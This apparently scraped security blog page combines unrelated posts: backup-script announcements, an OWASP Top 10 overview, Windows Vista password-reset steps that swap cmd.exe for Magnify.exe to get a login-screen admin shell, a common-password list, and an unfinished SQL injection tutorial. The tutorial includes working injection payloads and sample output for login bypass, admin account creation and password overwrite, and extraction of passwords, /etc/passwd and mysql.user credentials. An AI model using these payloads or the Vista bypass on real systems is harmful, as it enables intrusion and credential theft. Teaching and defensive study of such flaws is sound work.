Hello ,

i have created a small bash script to backup complete mysql server and then restore it. you can download the script and configure it as per your need.

Download :

      mysql-backup.sh         29-Apr-2009 08:31  488
      mysql-restore.sh        29-Apr-2009 08:31  1.0K

you need to change permissions for this script to be executed change permissions using :

chmod +x mysql-backup.sh

chmod +x mysql-restore.sh

This script requres mysql server, mysql clinet  and mysqldump to take backup of databases and then to restore it ,

Please post you feedback if you got any problem using this script please comment below .

Hello guys ,

i hope most of you have subversion installed and running , and you might have got chance        to  take backup of you subversion repositories.

i have created couple of scripts that can take mass backup of all repositores in your   subversion repositories parent directory also the other script restore all repositories , all you  need is to change path for backup place and your repositores folder and then enjoy while this script take backup of each repository automatically it saves a lot of time.

Download Both scripts :

Backup.sh

Restore.sh

Below is step by step procedure on how to use this script :

Please if you modify it don’t remove my name or links

Step 1 ) upload backup.sh to you subversion server ,

Step 2) configure backup.sh according to your server requirements

Step 3) modify permissions for script using :

chmod +x backup.sh

Step 4) start the backup using : (* you should have permissions to directories on server where your repo exists)

sh backup.sh

Step 5) check backup logs using :

tail -f  {logfilepathhere}

Step 6)  Now Backup completed so you can compress backups files using :

tar cfz subversion_backup.tar.gz /home/svn/backups/full

Step 7) Move backup to new server where you want to take your svn or to some safe place

Step Start the restore process & upload restore.sh

Step 9) config paths in restore.sh as in step 2

Step 10) change permission of it using :

chmod +x restore.sh

Step 11) Execute the restore script :

sh restore.sh

Step 12) Every thing is restored you may go to bed for sleep now

Enjoy the script and do post your feedback , if anyone need subversion installation or backup or any other professional service you may contact me adeel.ahmad+hackinggurus at networkncc.com .

1. Cross site scripting (XSS)

The problem: The “most prevalent and pernicious” Web application security vulnerability, XSS flaws happen when an application sends user data to a Web browser without first validating or encoding the content. This lets hackers execute malicious scripts in a browser, letting them hijack user sessions, deface Web sites, insert hostile content and conduct phishing and malware attacks.

Attacks are usually executed with JavaScript, letting hackers manipulate any aspect of a page. In a worst-case scenario, a hacker could steal information and impersonate a user on a bank’s Web site, according to Snyder.

Real-world example: PayPal was targeted last year when attackers redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were redirected to a phishing site and prompted to enter PayPal login information, Social Security numbers and credit card details. PayPal said it closed the vulnerability in June 2006.

How to protect users: Use a whitelist to validate all incoming data, which rejects any data that’s not specified on the whitelist as being good. This approach is the opposite of blacklisting, which rejects only inputs known to be bad. Additionally, use appropriate encoding of all output data. “Validation allows the detection of attacks, and encoding prevents any successful script injection from running in the browser,” OWASP says.

2. Injection flaws

The problem: When user-supplied data is sent to interpreters as part of a command or query, hackers trick the interpreter — which interprets text-based commands — into executing unintended commands. “Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application,” OWASP writes. “In the worst-case scenario, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments.”

Real-world example: Russian hackers broke into a Rhode Island government Web site to steal credit card data in January 2006. Hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claims it was only 4,113.

How to protect users: Avoid using interpreters if possible. “If you must invoke an interpreter, the key method to avoid injections is the use of safe APIs, such as strongly typed parameterized queries and object relational mapping libraries,” OWASP writes.

3. Malicious file execution

The problem: Hackers can perform remote code execution, remote installation of rootkits, or completely compromise a system. Any type of Web application is vulnerable if it accepts filenames or files from users. The vulnerability may be most common with PHP, a widely used scripting language for Web development.

Real-world example: A teenage programmer discovered in 2002 that Guess.com was vulnerable to attacks that could steal more than 200,000 customer records from the Guess database, including names, credit card numbers and expiration dates. Guess agreed to upgrade its information security the next year after being investigated by the Federal Trade Commission.

How to protect users: Don’t use input supplied by users in any filename for server-based resources, such as images and script inclusions. Set firewall rules to prevent new connections to external Web sites and internal systems.

4. Insecure direct object reference

The problem: Attackers manipulate direct object references to gain unauthorized access to other objects. It happens when URLs or form parameters contain references to objects such as files, directories, database records or keys.

Banking Web sites commonly use a customer account number as the primary key, and may expose account numbers in the Web interface.

“References to database keys are frequently exposed,” OWASP writes. “An attacker can attack these parameters simply by guessing or searching for another valid key. Often, these are sequential in nature.”

Real-world example: An Australian Taxation Office site was hacked in 2000 by a user who changed a tax ID present in a URL to access details on 17,000 companies. The hacker e-mailed the 17,000 businesses to notify them of the security breach.

How to protect users: Use an index, indirect reference map or another indirect method to avoid exposure of direct object references. If you can’t avoid direct references, authorize Web site visitors before using them

5. Cross site request forgery

The problem: “Simple and devastating,” this attack takes control of victim’s browser when it is logged onto a Web site, and sends malicious requests to the Web application. Web sites are extremely vulnerable, partly because they tend to authorize requests based on session cookies or “remember me” functionality. Banks are potential targets.

“Ninety-nine percent of the applications on the Internet are susceptible to cross site request forgery,” Williams says. “Has there been an actual exploit where someone’s lost money? Probably the banks don’t even know. To the bank, all it looks like is a legitimate transaction from a logged-in user.”

Real-world example: A hacker known as Samy gained more than a million “friends” on MySpace.com with a worm in late 2005, automatically including the message “Samy is my hero” in thousands of MySpace pages. The attack itself may not have been that harmful, but it was said to demonstrate the power of combining cross site scripting with cross site request forgery. Another example that came to light one year ago exposed a Google vulnerability allowing outside sites to change a Google user’s language preferences.

How to protect users: Don’t rely on credentials or tokens automatically submitted by browsers. “The only solution is to use a custom token that the browser will not ‘remember,’” OWASP writes.

6. Information leakage and improper error handling

The problem: Error messages that applications generate and display to users are useful to hackers when they violate privacy or unintentionally leak information about the program’s configuration and internal workings.

“Web applications will often leak information about their internal state through detailed or debug error messages. Often, this information can be leveraged to launch or even automate more powerful attacks,” OWASP says.

Real-world example: Information leakage goes well beyond error handling, applying also to breaches occurring when confidential data is left in plain sight. The ChoicePoint debacle in early 2005 thus falls somewhere in this category. The records of 163,000 consumers were compromised after criminals pretending to be legitimate ChoicePoint customers sought details about individuals listed in the company’s database of personal information. ChoicePoint subsequently limited its sales of information products containing sensitive data.

How to protect users: Use a testing tool such as OWASP’S WebScarab Project to see what errors your application generates. “Applications that have not been tested in this way will almost certainly generate unexpected error output,” OWASP writes.

7. Broken authentication and session management

The problem: User and administrative accounts can be hijacked when applications fail to protect credentials and session tokens from beginning to end. Watch out for privacy violations and the undermining of authorization and accountability controls.

“Flaws in the main authentication mechanism are not uncommon, but weaknesses are more often introduced through ancillary authentication functions such as logout, password management, timeout, remember me, secret question and account update,” OWASP writes.

Real-world example: Microsoft had to eliminate a vulnerability in Hotmail that could have let malicious JavaScript programmers steal user passwords in 2002. Revealed by a networking products reseller, the flaw was vulnerable to e-mails containing Trojans that altered the Hotmail user interface, forcing users to repeatedly reenter their passwords and unwittingly send them to hackers.

How to protect users: Communication and credential storage has to be secure. The SSL protocol for transmitting private documents should be the only option for authenticated parts of the application, and credentials should be stored in hashed or encrypted form.

Another tip: get rid of custom cookies used for authentication or session management.

8. Insecure cryptographic storage

The problem: Many Web developers fail to encrypt sensitive data in storage, even though cryptography is a key part of most Web applications. Even when encryption is present, it’s often poorly designed, using inappropriate ciphers.

“These flaws can lead to disclosure of sensitive data and compliance violations,” OWASP writes.

Real-world example: The TJX data breach that exposed 45.7 million credit and debit card numbers. A Canadian government investigation faulted TJX for failing to upgrade its data encryption system before it was targeted by electronic eavesdropping starting in July 2005.
How to protect users: Don’t invent your own cryptographic algorithms. “Only use approved public algorithms such as AES, RSA public key cryptography, and SHA-256 or better for hashing,” OWASP advises.

Furthermore, generate keys offline, and never transmit private keys over insecure channels.

9. Insecure communications

The problem: Similar to No. 8, this is a failure to encrypt network traffic when it’s necessary to protect sensitive communications. Attackers can access unprotected conversations, including transmissions of credentials and sensitive information. For this reason, PCI standards require encryption of credit card information transmitted over the Internet.

Real-world example: TJX again. Investigators believe hackers used a telescope-shaped antenna and laptop computer to steal data exchanged wirelessly between portable price-checking devices, cash registers and store computers, the Wall Street Journal reported.

“The $17.4-billion retailer’s wireless network had less security than many people have on their home networks,” the Journal wrote. TJX was using the WEP encoding system, rather than the more robust WPA.

How to protect users: Use SSL on any authenticated connection or during the transmission of sensitive data, such as user credentials, credit card details, health records and other private information. SSL or a similar encryption protocol should also be applied to client, partner, staff and administrative access to online systems. Use transport layer security or protocol level encryption to protect communications between parts of your infrastructure, such as Web servers and database systems.

10. Failure to restrict URL access

The problem: Some Web pages are supposed to be restricted to a small subset of privileged users, such as administrators. Yet often there’s no real protection of these pages, and hackers can find the URLs by making educated guesses. Say a URL refers to an ID number such as “123456.” A hacker might say ‘I wonder what’s in 123457?’ Williams says.

The attacks targeting this vulnerability are called forced browsing, “which encompasses guessing links and brute force techniques to find unprotected pages,” OWASP says.

Real-world example: A hole on the Macworld Conference & Expo Web site this year let users get “Platinum” passes worth nearly $1,700 and special access to a Steve Jobs keynote speech, all for free. The flaw was code that evaluated privileges on the client but not on the server, letting people grab free passes via JavaScript on the browser, rather than the server.

How to protect users: Don’t assume users will be unaware of hidden URLs. All URLs and business functions should be protected by an effective access control mechanism that verifies the user’s role and privileges. “Make sure this is done … every step of the way, not just once towards the beginning of any multi-step process,’ OWASP advises.

Have you forgotten your windows vista password ?   you cannot login to your  computer / laptop ? No worries you can hack windows vista to reset your windows vista password.

Requirements :

1 ) Windows Vista DVD
2 ) Computer with Windows Vista

Please follow steps below to reset your Windows Vista Password in 10 minutes.

Steps :

1. Insert the Windows Vista DVD into the DVD drive and then restart the computer.
2. Change Boot Options 1st Priority to Optical Drive.
3. When system booting up, if the message “Press any key to boot from cd” appears, immediately press Enter.
4. On Language Settings, Time and Currency and Keyboard Layout screen, just choose the correct settings then click Next.
5. On Install Now screen, click Repair. Note: Click No just in case you get the message: Windows found problems with your computer’s startup options.
6. On the System Recovery Options screen, under Operating System, click Windows Vista then click Next. Then select Command Prompt.
7. At the command prompt windows, type the following command then press Enter after typing each command:
c:
cd windows\system32
echo ~takeown /f %1 /r /d y > TakeControlOf.cmd
echo ~icacls %1 /grant administrators:F /t
ren Magnify.exe Magnify.old
ren cmd.exe Magnify.exe
8. Restart the computer.
9. On the Welcome Screen, click the Ease button.
10. Check Make items on the screen larger then click OK.
11. At the prompt, type the command then press Enter.

net user Administrator /active:yes
exit
12. Restart the computer.

13. At the welcome screen, logon using the local administrator account.
14. Access Control Panel then click User Accounts. Select the username of the account you can’t login to then remove the password.
15. Log off on the current local administrator account your are logon to.
16. Check if you can logon to your user account now.
17. Open c:\windows\system32.
18. Right click on Magnify.exe, select Properties -> Security -> Advanced -> Owner -> Edit -> Administrators then click OK.
19. Select Edit -> Administrators -> Full Control then click Apply then OK.
20. Rename Magnify.old to Magnify.exe
21. Open command prompt then type the command then press Enter.
net user Administrator /active:no

i hope this will help you feedback will be appreciate.

Here are most Commonly Chosen Passwords , Please don not use these words as your Passwords. Please use Password Meter [ http://www.passwordmeter.com/ ] .

aaa abc academia academic access ada admin adrian adrianna aerobics airplane albany albatross albert alex alexander alf algebra alias aliases alice alicia alisa alison allison alpha alphabet ama amadeus amanda amber amorphous amy analog anchor andrea andromache andy angela angerine angie animals anita ann anna anne annette answer anthropogenic anvils anything april aria ariadne arlene arrow arthur asd asm asshole athena atmosphere aztecs azure

bacchus badass bailey banana bananas bandit banks barbara barber baritone bart bartman basic bass bassoon batch batman beach beater beauty beaver becky beethoven beloved benz beowulf berkeley berlin berliner beryl beta beth betsie betty beverly bicameral bishop bitch bob bradley brandi brandy brenda brian bridget broadway bsd bumbling burgess

cad camille campanile candi candy cantor cardinal caren carla carmen carol carole carolina caroline carrie carson cascades castle cat catherine cathy cayuga cecily celtics cerulean change charity charles charming charon chat chem chemistry chess chester christina christine christy cigar cindy class classic claudia cluster clusters code coffee coke collins commrades computer comrade comrades condo condom connect connie console cookie cooper cornelius couscous create creation creosote cretin criminal cristina crystal cshrc cynthia

daemon daisy dana dancer daniel danielle danny dapper data dave dawn deb debbie deborah december default defoe deluge denise desiree desperate develop device dial diana diane diet dieter digital disc discovery disk disney dog dos drought dulce duncan

eager earth easier easy eatme edges edinburgh edwin edwina egghead eiderdown eileen einstein elaine elanor elephant elizabeth ellen email emerald emily emmanuel enemy engine engineer enterprise enzyme erenity erica erika erin ersatz establish estate eternity euclid evelyn extension

fairway felicia fender fermat ferrari fidelity field file finite fishers flakes float flower flowers foolproof football foresight format forsythe fourier fred friend frighten fun function fungible

gabriel games gardner garfield gatt gauss george gertrude gibson gina ginger glacier gnu golf golfer gorgeous gorges gosling gouge graham grahm group gryphon gucci guess guest guitar gumption guntis

hack hacker hal hamlet handily happening harmony harold harvey hawaii heather hebrides heidi heinlein hello help herbert hiawatha hibernia hidden holly homework honey horse horus hutchins hydrogen

ibm imbroglio imperial include ingres ingress ingrid inna innocuous internet irene irishman isis

jackie jane janet janice janie japan jasmin jean jeanne jen jenni jennifer jenny jessica jester jill jixian joanne jody johnny joseph joshua joy joyce judith judy juggle julia julie june jupiter

karen karie karina kate kathleen kathrine kathy katina katrina kelly keri kermit kernel kerri kerrie kerry key kim kimberly kirkland kitten knight krista kristen kristi kristie kristin kristine kristy

ladle lambda lamination lana lara larkin larry laura lazarus leah lebesgue lee leland leroy leslie lewis library light linda lisa lisp liz lock lockout lois lori lorin lorraine louis love lucy lynn lynne

macintosh mack maggot magic mail maint malcolm malcom manager mara marci marcy maria marietta mark markus marni mars marty marvin mary master math maurice meagan megan melissa mellon memory mercury merlin mets mgr michael michele michelle mickey mike minimum minsky mit modem mogul moguls monica moose morley mouse mozart mutant

nagel nancy napoleon nasa nepenthe neptune ness net network new news newton next nicole nita nobody noreen noxious nuclear nutrition nyquist

oceanography ocelot office olivetti olivia open operator oracle orca orwell osiris outlaw oxford

pacific pad painless pakistan pam pamela paper papers pass password pat patricia patty paula pencil penelope penguin penis peoria percolate persimmon persona pete peter philip phoenix phone pierre pizza plane playboy plover pluto plymouth polly polynomial pondering pork porsche poster power praise precious prelude presto prince princeton priv private privs professor profile program protect protozoa pub public pumpkin puneet puppet

qwerty

rabbit rachel rachelle rachmaninoff rainbow raindrop raleigh random rascal reagan really rebecca regional remote renee rick ripple risc rje robin robot robotics robyn rochelle rochester rodent rolex romano ronald root rose rosebud rosemary roses ruben rules ruth

sal samantha sandra sandy sara sarah saturn saxon scamper scheme school scott scotty secret security sensor serenity service sesame sex shannon sharc shark sharks sharon sheffield sheldon shell sherri shirley shit shiva shivers shuttle signature simon simple simpsons singer single smile smiles smooch smother snatch snoopy soap socrates somebody sondra sonia sonya sossina sparrows spit spring springer squires stacey staci stacie stacy steph stephanie strangle stratford student stuttgart subway success summer sun super superstage superuser support supported surfer susan susanne susie suzanne suzie swearer sybil symmetry sys sysadmin system

tamara tami tamie tammy tangerine tape tara target tarragon taylor tech telephone temptation tennis terminal test thailand theresa tiffany tiger tina toggle tomato topography tortoise toxic toyota traci tracie tracy trails transfer trisha trivial trombone tty tubas tuttle

umesh unhappy unicorn unix unknown uranus urchin ursula util utility uucp

valerie vasant venus veronica vertigo vicky village virgin virginia visitor

wargames warren water weenie wendi wendy whatever whatnot whiting whitney wholesale will william williamsburg willie wilma winston wisconsin wizard wombat woodwind word work wormwood wyoming

xfer xmodem xyz xyzzy

yaco yang yellowstone yolanda yosemite

zap zimmerman zmodem

-[ SUMMARY ]———————————————————————
Introduction
Injecting SQL
Exploiting a Login Form
Exploiting Different SQL Statement Type
Basic Victim Fingerprinting
Standard Blind SQL Injection
Double Query
Filters Evasion
SQL Injection Prevention
Conclusion
———————————————————————————

—[  Introduction ]

Hi everybody! I’m here again to write a little, but I hope interesting, paper concerning
Web Application Security. The aim of these lines are to help you to understand security
flaws regarding SQL Injection.

I know that maybe lots of things here explained are a little bit old; but lots of people
asked to me by email how to find/to prevent SQL Injection flaws in their codes.

Yes, we could say that this is the second part of my first paper regarding PHP flaws
(PHP Underground Security) wrote times ago; where I explained in a very basic form the SQL Injection
(The reason? The focus was on an other principal theme).

How I wrote this paper? In my free time, a couple of lines to help people to find, prevent
this kind of attacks. I hope you enjoy it. For any question or whatever please
contact me here: omni_0 [at] yahoo [DOT] com .
——————————————————————————-[/]

—[ Injecting SQL ]

As you know almost every dynamic web applications use a database (here we talk
about web application based on “LAMP architecture”) to store any kind of data needed
by the application such as images path, texts, user accounts, personal information,
goods in stock, etc.

The web application access to those information by using the SQL (Structured Query
Language). This kind of applications construct one or more SQL Statement to query
the DataBase (and for example to retrieve data); but this query sometimes incorporporate
user-supplied data. (take in mind this)

What about SQL? SQL is a DML (Data Manipulation Language) that is used
to insert, retrive and modify records present in the DataBase.

As I said before web application uses user-supplied data to query the DB but if the
supplied data is not properly sanitized before being used this can be unsafe and
an attacker can INJECT HIS OWN SQL code.
These flaws can be very destructive because an attacker can:

- Inject his data
- Retrive information about users, CC, DBMS.. (make a kind of information gathering)
- and so on..

The fundamentals of SQL Injection are similar to lots of DBMS but, as you know
there are some differences, in this paper I will cover “Exploting SQL Injection
in MySQL DBMS” as said upon (this means that if you want to test techniques here
explained on others DBMS you need to try at your own).
——————————————————————————-[/]

—[ Exploiting a Login Form ]

Sometimes happends that coders doesn’t properly sanitize 2 important variables
such as user-name and password in the login form and this involve a critical
vulnerability that will allow to the attacker the access to a reserved area.

Let’s make an example query here below:

SELECT * FROM users WHERE username = ‘admin’ and password = ’secret’

With this query the admin supply the username ‘admin’ and the password ’secret’
if those are true, the admin will login into the application.
Let us suppose that the script is vulnerabile to sql injection; what happends
if we know the admin username (in this case ‘admin’)? We don’t know the password, but
can we make an SQL Injection attack? Yes, easily and then we can gain the access to the application.
In this way:

SELECT * FROM users WHERE username = ‘admin’ /*’ and password = ‘foobar’

So, we supplied this information:

- As username = admin’ /*
- As password = foobar (what we want..)

Yes, the query will be true because admin is the right username but then with the
‘ /* ‘ symbol we commented the left SQL Statement.

Here below a funny (but true) example:

$sql = “SELECT permissions, username FROM $prefix”.”auth WHERE
username = ‘” . $_POST['username'] . “‘ AND password = MD5(’”.$_POST['wordpass'].”‘);”;

$query = mysql_query($sql, $conn);

The variables passed with the POST method are not properly sanitized before being used
and an attacker can inject sql code to gain access to the application.
This is a simple attack but it has a very critical impact.
——————————————————————————-[/]

—[  Exploiting Different SQL Statement Type ]

SQL Language uses different type of statements that could help the programmer to
make different queries to the DataBase; for example a SELECTion of record,
UPDATE, INSERTing new rows and so on. If the source is bugged an attacker can
“hack the query” in multiple ways; here below some examples.

SELECT Statement
——————

SELECT Statement is used to retrieve information from the database; and is
frequentely used “in every” application that returns information in response
to a user query. For example SELECT is used for login forms, browsing catalog, viewing
users infos, user profiles, in search engines, etc. The “point of failure” is
often the WHERE clause where exactly the users put their supplied arguments.

But sometimes happends that the “point of failure” is in the FROM clause; this
happends very rarely.

INSERT Statement
——————

INSERT statement is used to add new row in the table; and sometimes the application
doesn’t properly sanitize the data, so a query like the beneath could be vulnerable:

INSERT INTO usr (user, pwd, privilege) VALUES (’new’, ‘pwd’, 10)

What happends if the pwd or username are not safe? We can absolutely “hack the
query” and perform a new interesting query as shown below:

INSERT INTO usr (user, pwd, privilege) VALUES (’hacker’, ‘test’, 1)/*’, 3)

In this example the pwd field is unsafe and is used to create a new user with
the admin privilege (privilege = 1):

$SQL= “INSERT INTO usr (user, pwd, id) VALUES (’new’, ‘”.$_GET['p'].”‘, 3)”;

$result = mysql_query($SQL);

UPDATE Statement
——————

UPDATE statement is used (as the word says) to UPDATE one or more records.
This type of statement is used when users (logged into the application) need
to change their own profile information; such as password, the billing address,
etc. An example of how the UPDATE statement works is shown below:

UPDATE usr SET pwd=’newpwd’ WHERE user = ‘billyJoe’ and password = ‘Billy’

The field pwd in the update_profile.php form is absolutely “a user-supply data”; so,
try to imagine what happends if the code is like the (vulnerable) code pasted below:

$SQL = “UPDATE usr SET pwd=’”.$_GET['np'].”‘ WHERE user = ‘billyJoe’ and pwd = ‘Billy’”;
$result = mysql_query($SQL);

In this query the password needs to be correct (so, the user needs to know his own password )
and the password will be supplied with the GET method; but leave out this detail (it’s not so important
for our code injection) and concentrate to the new password field (supplied by $_GET['np'], that
is not sanitized); what happeds if we will inject our code here? Let see below:

UPDATE usr SET pwd=’owned’ WHERE user=’admin’/*’ WHERE user = ‘ad’ and pwd = ’se’

here we just changed the admin password to ‘ owned ‘ sounds interesting right?

UNION SELECT Statement
————————-

The “UNION SELECT Statement” is used in SQL to combine the results of 2
or more different SELECT query; obviously in one result.
This kind of statement is very interesting because when you have a SELECT query
often you can add your own UNION SELECT statement to combine the queries (sure,
only if you have a “bugged sql statement”) and view the 2 (or more) results in only
one result set. To better understand what I mean I think is better to see an interesting
example and put our hands on it.

Here is our vulnerable code:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

$SQL = “select * from news where id=”.$_GET['id'];

$result = mysql_query($SQL);

if (!$result) {
die(’Invalid query: ‘ . mysql_error());
}

// Our query is TRUE
if ($result) {
echo ‘<br><br>WELCOME TO www.victim.net NEWS<br>’;
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {

echo ‘<br>Title:’.$row[1].’<br>’;
echo ‘<br>News:<br>’.$row[2];
}

}

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

As we can see the $SQL variable is vulnerable and an attacker can inject his own
code into it and then gain interesting information. What happends if via browser we
call this URL: http://www.victim.net/CMS/view.php?id=1 ?

Nothing interesting, just our news with the ID equal to 1, here below:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

How to make this interesting? We can use our UNION SELECT operator, and the
resultant query will be:

select * from news where id=1 UNION SELECT * FROM usr WHERE id = 1

What is gonna happend? Look below:

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?
Title:secret

News:
1

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

“Title: secret” is the admin password (ID = 1 is the admin in most cases) and the 1 in the “News:”
is the admin ID. So, why our output is so strange? This is not strange our tables has been made
in different ways. Just to make things clear look the tables below:

mysql> select * from usr;
———————–
| user | pwd | id |
———————–
| admin | secret | 1 |
———————–
| ad | aaaaa | 2 |
———————–
| new | test | 5 |
———————–

mysql> select * from news;
—————————————————
| id | title | texts |
—————————————————
| 1 | testing news | what about SQL Injection? |
—————————————————
| 2 | testing news 2 | could be bypassed easily? |
—————————————————

Our UNION SELECT query will be:

mysql> select * from news where id = 1 union select * from usr where id = 1;
—————————————————
| id | title | texts |
—————————————————
| 1 | testing news | what about SQL Injection? |
—————————————————
| admin | secret | 1 |
—————————————————

Is now clear? We have found the admin password. It’s great!

Ok, lets go deeper; what happends if we have 2 tables with a different number of
columns? Unfortunaltely UNION SELECT doesn’t work as show upon. I want to make
2 different examples to help you.

LESS FIELDS
————

mysql> select * from Anews;
————————————————
| title | texts |
————————————————
| testing news 2 | could be bypassed easily? |
————————————————

mysql> select * from Anews union select * from usr;
ERROR 1222 (21000): The used SELECT statements have a different number of columns

Yes, this is what happends if the UNION SELECT is used and the tables have a different
number of columns. So, what we can do to bypass this?

mysql> select * from Anews union select id, CONCAT_WS(’ – ‘, user, pwd) from usr;
——————————————–
| title | texts |
——————————————–
| testing news 2 | could be bypassed easily? |
——————————————–
| 1 | admin – secret |
——————————————–
| 2 | ad – aaaaa |
——————————————–
| 5 | new – test |
——————————————–

We bypassed “the problem” just using a MySQL function CONCAT_WS (CONCAT can be used too).
Take in mind that different DBMS works in different way. I’m explaining in a general manner; therefore
sometimes you have to find other ways.

MORE FIELDS
————-

mysql> select * from fnews;
——————————————————–
| id | pri | title | texts |
——————————————————–
| 1 | 0 | testing news 2 | could be bypassed easily? |
——————————————————–

What we can do now? Easy, just add a NULL field!!

mysql> select * from fnews union select NULL, id, user, pwd from usr;
———————————————————
| id | pri | title | texts |
———————————————————
| 1 | 0 | testing news 2 | could be bypassed easily? |
———————————————————
| NULL | 1 | admin | secre |
———————————————————
| NULL | 2 | ad | aaaaa |
———————————————————
| NULL | 5 | new | test |
———————————————————

——————————————————————————-[/]

—[  Basic Victim Fingerprinting ]

In this part of the paper I’ll explain some easy, but interesting, ways used while trying to do
information gathering before the Vulnerability Assessment and Penetration Test steps.

This is our scenario: we found a bugged Web Application on the host and we can inject our
SQL code.

So, what we need to know? Could be interesting to know the mysql server version;
maybe it’s a bugged version and we can exploit it.

How to do that? (I will not use bugged code; I’ll just make some examples. Use your
mind to understand how to use “these tips”)

mysql> select * from fnews WHERE id = 1 union select version(), NULL, NULL, NULL from usr;
—————————————————————————–
| id | pri | title | texts |
—————————————————————————–
| 1 | 0 | testing news 2 | could be bypassed easily? |
—————————————————————————–
| 5.0.22-Debian | NULL | NULL | NULL |
—————————————————————————–

Here our mysql version. Also the OS has been putted on the screen (take in mind that
sometimes these information are modified).

Could be interesting to know the server time:

mysql> select * from fnews WHERE id = 1 union select NOW(), NULL, NULL, NULL from usr;
—————————————————————————
| id | pri | title | texts |
—————————————————————————
| 1 | 0 | testing news 2 | could be bypassed easily? |
—————————————————————————
| 2009-02-27 00:03:56 | NULL | NULL | NULL |
—————————————————————————

Yes, sometimes is useful to know what is the user used to connect to the database.

mysql> select * from fnews WHERE id = 1 union select USER(), NULL, NULL, NULL from usr;

——————————————————————–
| id | pri | title | texts |
——————————————————————–
| 1 | 0 | testing news 2 | could be bypassed easily? |
——————————————————————–
| omni@localhost | NULL | NULL | NULL |
——————————————————————–

An interesting function implemented in mysql server is LOAD_FILE that, as the
word say, is able to load a file. What we can do with this? gain information and
read files. Here below the query used as example:

select * from news where id=1 union select NULL,NULL,LOAD_FILE(’/etc/passwd’) from usr;

This is what my FireFox shows to me:

http://www.victim.net/CMS/view.php?id=1%20union%20select%20NULL,NULL,LOAD_FILE(’/etc/password’)%20from%20usr;

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?
Title:

News:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]
[output cutted]
[...]

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

Sounds interesting right, don’t you?

Could be interesting to get some sensitive information such as mysql users and passwords
right? By injecting our code as shown below we can get such that information.

SELECT * FROM news WHERE id=’1′ UNION SELECT Host, User, Password FROM mysql.user/*’
——————————————————————————-[/]

—[  Standard Blind SQL Injection ]

SQL Injection and Blind SQL Injection are attacks that are able to exploit a software
vulnerability by injecting sql codes; but the main difference between these attacks
is the method of determination of the vulnerability.

Yes, because in the Blind SQL Injection attacks, attacker will look the results
of his/her requests (with different parameter values) and if these results will return
the same information he/she could obtain some interesting data. (I know, it seems
a bit strange; but between few lines you will understand better).

But why Standard Blind SQL Injection? What does it mean? In this part of the paper
I’ll explain the basic way to obtain information with Blind SQL Injection without bear
in mind that this type of attacks could be optimized. I don’t wanna talk about the
methods to optimize a Blind SQL Injection attack.(Wisec found interesting things about that -
“Optimizing the number of requests in blind SQL injection”).

Ok, let’s make a step forward and begin talking about Detection of Blind SQL Injection.
To test this vulnerability we have to find a condition that is always true; for example
1=1 is always TRUE right? Yes, but when we have to inject our code in the WHERE
condition we don’t know if our new injected query will be true or false; therefore
we have to make some tests. When the query is true? The query is true when the record
returned contain the correct information. Maybe is a little bit strange this explanation but
to make things clear I wanna let you see an example. Suppose that we requested this
URL:

http://www.victim.net/CMS/view.php?id=1

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

WELCOME TO www.victim.net NEWS

Title:testing news

News:
what about SQL Injection?

-/-/-/-/-/-/-/-/-/ cut -/-/-/-/-/-/-/-/-/

As you can see we have just viewed our first news (id=1). What happends if we request
this other URL: http://www.victim.net/CMS/view.php?id=1 AND 1=1 ?
In our browser we just see the same page because the query is obviously true.
Here below the injected query:

SELECT * FROM news WHERE id=1 AND 1=1 LIMIT 1

Now, we (I hope) have understood what is a Blind SQL Injection; and to understand
better how we can use this, I want to make a simple example/scenario. I’m thinking that
the web application is connected to MySQL using the user omni; how to know this by using
Blind SQL Injection? Just requesting this URL:

http://www.victim.net/CMS/view.php?id=1 AND USER()=omni@localhost’

and watch the reply sent on our browser. If in our FireFox (or whatever you want)
we will see the news with ID=1 we know that omni is the user used to connect to
the mysql deamon (because the query is true; and we found the true value to pass
to the query).
Let’s go deeper. What we can do with Blind SQL? Could be interesting to retrieve
the admin password. How to do that? First of all to understand better the
steps I’m going to explain we need to know some basic information.

Function used in MySQL:

- ASCII(str)
Returns the numeric value of the leftmost character of the string str.
Returns 0 if str is the empty string. Returns NULL if str is NULL. ASCII()
works for 8-bit characters.

mysql> select ascii(’a');
———–
| ascii(’A') |
———–
| 97 |
———–

mysql> select ascii(’b');
———–
| ascii(’b') |
———–
| 98 |
———–

- ORD(str)

If the leftmost character of the string str is a multi-byte character, returns
the code for that character, calculated from the numeric values of its constituent
bytes using this formula:

(1st byte code)
+ (2nd byte code x 256)
+ (3rd byte code x 2562) …

If the leftmost character is not a multi-byte character, ORD() returns the same value as
the ASCII() function.

- SUBSTRING(str,pos), SUBSTRING(str FROM pos),
SUBSTRING(str,pos,len), SUBSTRING(str FROM pos FOR len)

The forms without a len argument return a substring from string str starting at position pos.
The forms with a len argument return a substring len characters long from string str, starting
at position pos.
The forms that use FROM are standard SQL syntax. It is also possible to use a negative value
for pos. In this case, the beginning of the substring is pos characters from the end of the
string, rather than the beginning.
A negative value may be used for pos in any of the forms of this function.

- SUBSTR(str,pos), SUBSTR(str FROM pos),
SUBSTR(str,pos,len), SUBSTR(str FROM pos FOR len)

SUBSTR() is a synonym for SUBSTRING().

mysql> select substring(’Blind SQL’, 1, 1);
—————————-
| substring(’Blind SQL’, 1, 1) |
—————————-
| B |
—————————-

